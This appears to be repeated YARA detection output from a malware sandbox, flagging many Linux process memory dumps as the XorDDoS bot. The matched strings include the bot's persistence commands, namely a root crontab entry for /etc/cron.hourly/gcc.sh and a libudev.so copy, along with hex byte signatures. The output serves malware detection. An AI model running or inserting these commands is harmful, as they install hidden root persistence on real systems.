6331.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6557.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6429.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6232.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6370.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6398.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6509.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6280.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6534.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6543.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6517.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6440.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6338.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6387.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
